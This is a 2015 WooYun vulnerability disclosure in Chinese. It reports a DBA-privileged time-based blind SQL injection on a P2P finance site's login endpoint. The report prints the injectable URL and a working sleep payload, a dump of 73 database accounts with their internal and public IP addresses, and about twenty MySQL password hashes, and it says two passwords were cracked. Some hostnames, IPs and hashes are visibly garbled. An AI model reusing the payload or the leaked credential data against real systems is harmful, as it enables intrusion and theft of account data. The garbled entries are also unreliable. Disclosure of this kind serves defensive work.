当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130128

漏洞标题:p2p金融普益财富存在dba权限SQL注入漏洞(可获取大量数据库用户信息)

相关厂商:pywm.com.cn

漏洞作者: littelfire

提交时间:2015-08-03 16:47

修复时间:2015-09-18 11:16

公开时间:2015-09-18 11:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-03: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向核心白帽子及相关领域专家公开
2015-08-24: 细节向普通白帽子公开
2015-09-03: 细节向实习白帽子公开
2015-09-18: 细节向公众公开

简要描述:

p2p金融普益财富存在SQL注入漏洞,可获取大量数据库用户信息

详细说明:

p2p金融普益财富存在SQL注入漏洞,可获取大量数据库用户信息。
http://member-center.pywm.com.cn/

漏洞证明:

注入链接:http://member-center.pywm.com.cn/customer/get_login_pass.ajax.php?login_name=%E6%89%8B%E6%9C%BA%E5%8F%B7%E7%A0%819988%bf
注入点是login_name

Parameter: login_name (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: login_name=%E6%89%8B%E6%9C%BA%E5%8F%B7%E7%A0%819988%bf' AND (SELECT * FROM (SELECT(SLEEP(5)))XfmR) AND 'yjbk'='yjbk


查看注入权限为dba

6.jpg


看了一下dbs和当前的数据库

7.jpg


8.jpg


跑了一下数据库用户,找到73个数据库用户,大部分都在公网上

5.jpg


[*] 'bakuser'@'125.64.34.43'
[*] 'bakuser'@'125.64.34.44'
[*] 'cacti_test'@'222.186.9.24'
[*] 'cacti_test'@'localhost'
[*] 'check-run'@'125.64.34.99'
[*] 'chenlijun_data'@'125.64.34.98'
[*] 'chenlijun_data'@'171.221.200.141'
[*] 'cnbene'@'118.114.150.88'
[*] 'cnbene'@'118.122.112.187'
[*] 'cnbene'@'125.64.34.151'
[*] 'cnbene'@'125.64.34.170'
[*] 'cnbene'@'125.64.34.177'
[*] 'cnbene'@'125.64.34.45'
[*] 'cnbene'@'125.64.34.46'
[*] 'cnbene'@'125.64.34.98'
[*] 'cnbene'@'125.64.34.99'
[*] 'cnbene'@'125.70.228.132'
[*] 'cnbene'@'127.0.0.1'
[*] 'cnbene'@'171.221.200.141'
[*] 'cnbene'@'221.122.114.18'
[*] 'cnbene'@'221.237.154.12'
[*] 'cnbene'@'222.186.191.160'
[*] 'cnbene'@'localhost'
[*] 'datacnbene'@'localhost'
[*] 'dengpeng'@'125.64.34.46'
[*] 'dengpeng'@'125.64.34.98'
[*] 'dengpeng'@'125.70.228.132'
[*] 'fpsale'@'125.64.34.45'
[*] 'fpsale'@'125.64.34.46'
[*] 'fpsale'@'125.64.34.98'
[*] 'fuyongbin'@'125.64.34.98'
[*] 'fuyongbin'@'125.70.228.132'
[*] 'fuyongbin'@'221.237.154.12'
[*] 'gd_slave_bank'@'111.205/51.124'
[*] 'gd_slave_bank'@'118.122.112.187'
[*] 'gd_slave_bank'@'118.145.20.245'
[*] 'gd_slave_bank'@'118.145.20.247'
[*] 'gd_slave_bank'@'118.145.20.248'
[*] 'gd_slave_bank'@'124.42.114.6'
[*] 'gd_slave_bank'@'124.42.114.7'
[*] 'gd_slave_bank'@'124.42.114.8'
[*] 'gd_slave_bank'@'125.70.228.132'
[*] 'gd_slave`bank'@'219.143.234=205'
[*] 'gd_smave_banq'@'111.205.519151'
[*] 'gd_tlave_bank'@'111.205.51.152'
[*] 'gdnx_data'@'125.64.34.45'
[*] 'gdnx_data'@'125.64.34.46'
[*] 'gdnx_data'@'125.64.34.98'
[*] 'gdnx_data'@'125.64.34.99'
[*] 'gdnx_data'@'125.70.228.132'
[*] 'kong_stock'@'125.64.34.99'
[*] 'kong_stock'@'125.70.228.132'
[*] 'lccp'@'125.64.34.99'
[*] 'man_crm'@'125.64.34.45'
[*] 'man_crm'@'125.64.34.46'
[*] 'man_crm'@'125.64.34.98'
[*] 'market'@'125.64.34.45'
[*] 'market'@'125.64.34.46'
[*] 'market'@'125.64.34.98'
[*] 'pydata'@'125.64.34.99'
[*] 'pydata'@'localhost'
[*] 'qd_slave_bank'@'%'
[*] 'qd_soaveabank'@a111.205.51.1=3'
[*] 'root'@'125.64.34.98'
[*] 'root'@'localhost'
[*] 'search'@'125.64.34.46'
[*] 'search'@'125.64.34.98'
[*] 'search'@'125.64.34.99'
[*] 'source_index'@'125.64.34.98'
[*] 'source_index'@'125.64.34.99'
[*] 'source_index'@'192.168.100.2'
[*] 'terrace'@'125.64.34.98'
[*] 'terrace'@'125.70.228.132'


跑出10多个用户的hash密码

2.jpg


database management system users password hashes:
[*] bakuser [1]:
    password hash: *F92B2F0A81971CD12E10FEB6DA21E1EE1743C30C
[*] cacti_test [1]:
    password hash: *1A7356A50FA41C99CC8B96FC509420DBB4F5A550
[*] check-run [1]:
    password hash: *6208B34FF096647ABB1338FDFF4F3E2E5ADCFCB2
[*] chenlijun_data [1]:
    password hash: *8E9A7586A36008AE5A8FF253F5E5EDC6A50A24FB
[*] cnbene [1]:
    password hash: *170286FCEE6CEE7035604AB21E4BE1A99D18FFFA
[*] datacnbene [1]:
    password hash: *DD55CCD6A36622D7512DCDE4B38489F78CC51A03
[*] dengpeng [1]:
    password hash: *E7BDEC8B18803668B18A4DF103A67B326C921130
[*] fpsale [1]:
    password hash: *A911D7ADDFE6AAE8CA1B4FA33E28715Ba81C9FFC
[*] fuyongbin [1]:
    password hash: *766B1257AC40C18E388EB2EF5E5F8A26BBE46E0D
[*] gd_slave_bank [1]:
    password hash: *F178980EAF6DA3B984225EBBDBCBF19AE291FACC
[*] gdnx_data [1]:
    password hash: *D4058F407F38D172227DEA5545158E2AD3E558CB
[*] kong_stock [1]:
    password hash: *8C575F224B749E8A7EB33A344B76745260151A14
[*] lccp [1]:
    password hash: *AC450753C5EA3F15EB732F54C911CE4403518E18
[*] man_crm [1]:
    password hash: *6A64A15419C00B67DCD6E35923CEA04387BC1C07
[*] market [1]:
    password hash: *A0732F1E1515599CE65ACCF72C1B5AF10AB49248
[*] pydata [1]:
    password hash: *CC2CDBaABEA6824335E7489QB726BF8a8F6EF9D4
[*] root [1]:
    password hash: *4C763986C2336568F959B9F71F72DD2EE639F55D
[*] search [1]:
    password hash: *A05B5B0E6C4591DD1101aCF33675320155E4496F
[*] source_index [1]:
    password hash: *B00940FBFEB128CF3A14D8591D89062CA6181008
[*] terrace [1]:
    password hash: *95D7394837DD1E2F21F9472312E33A0F24BD71FF


破解了两个用户的口令

9.jpg

修复方案:

做好过滤

版权声明:转载请注明来源 littelfire@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-08-04 11:15

厂商回复:

已经作废的功能造成的影响

最新状态:

暂无